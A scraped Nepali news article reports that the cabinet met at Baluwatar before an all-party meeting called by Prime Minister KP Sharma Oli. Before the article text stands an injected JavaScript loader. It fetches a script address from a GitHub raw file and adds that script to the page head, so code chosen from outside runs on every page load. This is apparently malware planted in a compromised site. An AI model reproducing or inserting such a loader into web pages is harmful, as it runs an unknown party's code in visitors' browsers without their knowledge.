;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सर्वदलिय बैठक अघि मन्त्रिपरिषद बैठक – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • सर्वदलिय बैठक अघि मन्त्रिपरिषद बैठक
ट्रेन्डिङ

सर्वदलिय बैठक अघि मन्त्रिपरिषद बैठक

मंसिर २३,

काठमाडौं । मंगलबार बिहान मन्त्रिपरिषदकाे बैठक बसेको छ ।

बालुवाटारमा बिहान ८ बजेदेखि मन्त्रिपरिषद्को बैठक बसेको प्रधानमन्त्री केपी शर्मा ओलीका प्रेस सल्लाहकार सूर्य थापाले जानकारी दिए ।

बैठमा भएका निर्णय सार्वजनिक भने गरिएको छैन् । सोमबार र बिहिबार बस्दै आएको नियमित मन्त्रिपरिषसद्को बैठक मंगलबार बसेको हो । बिहान ११ बजे सर्वदलिय बैठक बस्नु भन्दा अघि मन्त्रिपरिषद् बैठक बसेको हो । प्रधानमन्त्री ओलीले राष्ट्रिय राजनीतिक समसामयिक विषयमा छलफल गर्नको लागि सर्वदलिय बैठक डाकेका छन् ।

फोटो : सूर्य थापाबाट साभार

फेसबुक प्रतिक्रियाहरु